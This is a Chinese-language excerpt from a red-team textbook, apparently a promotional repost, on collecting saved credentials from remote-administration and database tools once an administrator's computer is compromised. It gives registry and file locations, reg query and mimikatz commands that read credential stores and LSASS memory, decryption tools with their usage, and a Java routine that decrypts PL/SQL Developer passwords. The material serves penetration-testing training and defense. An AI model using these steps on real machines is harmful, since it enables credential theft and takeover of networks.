点击星标，即时接收最新推文

本文选自《内网安全攻防：红队之路》

扫描二维码五折购书

内网敏感数据的发现

内网的核心敏感数据，不仅包括数据库、电子邮件，还包括个人数据及组织的业务数据、技术数据等。可以说，价值较高的数据基本都在内网中。本文重点介绍如何快速定位个人计算机，并对计算机操作系统信息、浏览器登录和使用的历史记录、用户文件操作行为以及聊天软件对话内容等信息进行收集。因此，了解攻击者的操作流程，对内网数据安全防护工作至关重要。

01

获取远程管理软件保存的凭据

当我们定位并控制了一台网络管理员或者DBA的个人机后，可以分析其常用的远程管理软件，然后尝试破解其保存在软件内的凭证，从而快速获取管理员拥有的各种权限，进一步控制目标网络。

PuTTY

PuTTY是一个Windows平台的Telnet、SSH、rlogin、纯TCP以及串行接口连接软件。下载地址为：https://www.chiark.greenend.org.uk/~sgtatham/putty/。

PuTTY的连接记录保存在注册表中，默认情况下不支持保存密码：

#连接记录

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys

#保存的会话

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

注册表保存的信息样例如图所示:

PuTTY注册表保存信息

我们可以使用下面的命令查看当前用户的连接记录：

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys

下面命令可以查看所有用户的连接记录（需要管理员权限）：

for /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get sid') do reg query HKEY_USERS\%c\Software\SimonTatham\PuTTY\SshHostKeys

WinSCP

WinSCP是一个Windows环境下使用SSH协议的开源图形化SFTP客户端。同时支持SCP协议。它的主要功能就是在本地与远程计算机间安全的复制文件。下载地址: https://winscp.net/eng/index.php

管理员如果选择了记住密码，则密码保存在注册表中或者WinSCP.ini中：

# 注册表

HKEY_USERS\SID\Software\Martin Prikryl\WinSCP 2\Sessions\

# 配置文件常见位置

C:\Users\%USERNAME%\AppData\Local\VirtualStore\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系 统)

C:\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统) C:\Users\%USERNAME%\AppData\Local\VirtualStore\Program Files\WinSCP\WinSCP.ini (32位操作系统)

C:\Program Files\WinSCP\WinSCP.ini (32位操作系统)

c:\Users\%username%\documents\

注册表保存的信息，如图所示：

WinSCP注册表保存信息

我们可以使用winscppwd.exe对保存的密码进行解密，如图2-57所示，工具地址https://www.softpedia.com/get/Security/Password-Managers-Generators/winscppwd.shtml

Usage:

        winscppwd.exe [user host pwd|path/to/winscp.ini]

Examples:

        winscppwd.exe foo example.com 0123456789ABCDEF

        winscppwd.exe /tmp/winscp.ini

winscppwd.exe解密WinSCP密码

Xmangager系列产品

Xshell 是一个用于 MS Windows 平台的强大的 SSH, TELNET 和 RLOGIN 终端仿真软件。它使得用户能轻松和 安全地从 Windows PC 上访问 UniX/LinuX 主机。

Xftp 是一个用于 MS Windows 平台的强大的 FTP 和 SFTP 文件传输程序。Xftp 能安全地在 UniX/LinuX 和 Windows PC 之间传输文件。

不同版本配置文件保存路径有所不同，具体如下：

Product	Session File Location
XShell 5	%userprofile%\Documents\NetSarang\Xshell\Sessions
XFtp 5	%userprofile%\Documents\NetSarang\Xftp\Sessions
XShell 6	%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XFtp 6	%userprofile%\Documents\NetSarang Computer\6\Xftp\Sessions

对于Xmangager保存的密码，我们可以使用Xdecrypt.py进行解密，如图所示，工具下载地址为https://github.com/dzxs/Xdecrypt：

usage: Xdecrypt.py [-h] [-s SID] [-p PASSWORD]

xsh, xfp password decrypt

optional arguments:

  -h, --help            show this help message and exit

  -s SID, --sid SID     `username`+`sid`, user `whoami /user` in command.

  -p PASSWORD, --password PASSWORD

                        the password in sessions or path of sessions

Xmangager产品密码解密

SecureCRT

Secure CRT 是一款 SSH 客户端软件，为 Windows、Mac 和 Linux 提供了终端模拟，通过先进的会话管理和 一系列节省时间和简化重复性任务的方法来提高生产力。SecureCRT 为你组织中的每个人提供安全的远程访问、文件传输和数据隧道。

SecureCRT配置文件保存路径如下：

%APPDATA%\VanDyke\Config\Sessions\sessionname.ini

# xp/Win2003

C:\Documents and Settings\%USERNAME%\Application Data\VanDyke\Config\Sessions

# Win7/win2008以上

C:\Users\%USERNAME%\AppData\Roaming\VanDyke\Config\Sessions

密文格式不同版本也有所不同：

#7.3.3之前

S:"Password"=c71bd1c86f3b804e42432f53247c50d9287f410c7e59166969acab69daa6eaadbe15c0c54c0e076e945 a6d82f9e13df2

#7.3.3之后

S:"Password V2"= 02:7b9f594a1f39bb36bbaa0d9688ee38b3d233c67b338e20e2113f2ba4d328b6fc8c804e3c02324b1eaad57a5b96ac1 fc5cc1ae0ee2930e6af2e5e644a28ebe3fc

对于7.x及以下版本，可以使用SecureCRTCipher.py进行解密，如图2-59所示，下载地址；https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/python3/SecureCRTCipher.py

$ ./SecureCRTCipher.py

Usage:

    SecureCRTCipher.py <enc|dec> [-v2] [-p ConfigPassphrase] <plaintext|ciphertext>

    <enc|dec>              "enc" for encryption, "dec" for decryption.

                           This parameter must be specified.

    [-v2]                  Encrypt/Decrypt with "Password V2" algorithm.

                           This parameter is optional.

    [-p ConfigPassphrase]  The config passphrase that SecureCRT uses.

                           This parameter is optional.

    <plaintext|ciphertext> Plaintext string or ciphertext string.

                           NOTICE: Ciphertext string must be a hex string.

                           This parameter must be specified.

SecureCRT 7.x以下密码解密

如果上面的脚本无法解密，也可以尝试使用另一个工具SecureCRT-decryptpass.py进行解密，如图所示，下载地址为：

https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py

使用SecureCRT-decryptpass.py解密密码

另外，对于高版本，可以把%APPDATA%\VanDyke\Config\整个目录拷贝到本机SecureCRT的Config目录下，然后直接连接。但需要注意的是版本要与目标主机使用的一致，否则可能出问题。

RDCMan

Remote Desktop Connection Manager (RDCMan) 是微软Windows Live体验团队的主要开发者 Julian Burger开发的一个远程桌面管理工具。简称为RDCMan。RDCMan可以集中管理、分类、组织远程桌面，相比Windows系统自带的远程桌面连接工具mstsc.exe要方便、省时的多。

RDCMan可以将连接的远程桌面信息保存为rdg文件。rdg文件内记录了目标IP、端口、登录所用用户名以及经过DPAPI加密的密码密文。

可以在目标主机使用mimikatz进行解密，如图所示：

 在线解密RDCMan密码

也可以在获取masterkry后离线解密，如图所示：

 离线解密RDCMan密码

我们可以使用Mimikatz从LSASS进程内存提取Master Key（需管理员权限），如图所示：

mimikatz.exe

privilege::debug

sekurlsa::dpapi

exit

Master Key提取

Navicat

Navicat是管理员常用的数据库工具，NavicatPremium支持MySQL，MariaDB，Oracle，SQLite， PostgreSQL和Microsoft SQL Server 多种数据库的连接。

Navicat连接凭证存储在注册表中：

Database Type	Path
MySQL	HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\ <your connection name>
MariaDB	HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\ <your connection name>
MongoDb	HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers\ <your connection name>
Microsoft SQL	HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\ <your connection name>
Oracle	HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\ <your connection name>
PostgreSQL	HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\ <your connection name>
SQLite	HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\ <your connection name>

注册表保存的信息样例如下，如图所示：

Navicat注册表保存信息

我们可以使用NavicatCrypto.py对保存的密码进行解密，如图2-65所示，工具下载地址为：

https://github.com/HyperSine/how-does-navicat-encrypt-password/blob/master/python3/NavicatCipher.py

Usage:

    NavicatCrypto.py <enc|dec> [-ncx] <plaintext|ciphertext>

<enc|dec>

[-ncx]

<plaintext|ciphertext>

"enc" for encryption, "dec" for decryption.

This parameter must be specified.

Indicate that plaintext/ciphertext is

prepared for/exported from NCX file.

This parameter is optional.

Plaintext string or ciphertext string.

NOTICE: Ciphertext string must be a hex string.

This parameter must be specified.

Navicat密码解密

PL/SQL Developer

PL/SQL Developer是一个集成开发环境，专门面向Oracle数据库存储程序单元的开发。如今，有越来越多的 商业逻辑和应用逻辑转向了Oracle Server，因此，PL/SQL编程也成了整个开发过程的一个重要组成部分。PL/SQL Developer侧重于易用性、代码品质和生产力，充分发挥Oracle应用程序开发过程中的主要优势。

PL/SQL Developer的凭据保存在如下路径的user.prefs文件的 [LogonHistory] 信息中：

C:\Users\%username%\AppData\Roaming\PLSQL Developer\Preferences\%username%\

C:\Program Files\PLSQL Developer\Preferences\%username%\

C:\Program Files (x86)\PLSQL Developer\Preferences\%username%\

每一行即为一个登录信息，这些信息是加密的，其明文格式如下为 username/password@server。

对于PL/SQL Developer的密码，我们可以使用下面的脚本进行解密，如图所示：

import java.util.ArrayList;

public class decrypt {

public static void decryptPassword(){

        String cryptText = "27364466441245823088463445483550317630583164315848803226352432463480326634363286";

        String plainText = "";

        ArrayList<Integer> values = new ArrayList<Integer>();

        for (int i = 0; i < cryptText.length(); i+= 4){

            values.add(Integer.parseInt((cryptText.substring(i, i + 4))));

        }

        int key = values.get(0);

        values.remove(0);

        for (int i = 0; i < values.size(); i++) {

            int val = values.get(i) - 1000;

            int mask = key + (10 * (i + 1));

            int res = (val ^ mask) >> 4;

            plainText += Character.toString((char)(res));

        }

        System.out.println("plainText:"+plainText);

    }

    public static void main(String[] args) {

        decryptPassword();

    }

 }

PL/SQL Developer密码解密

—  实验室旗下直播培训课程  —

和20000+位同学加入MS08067一起学习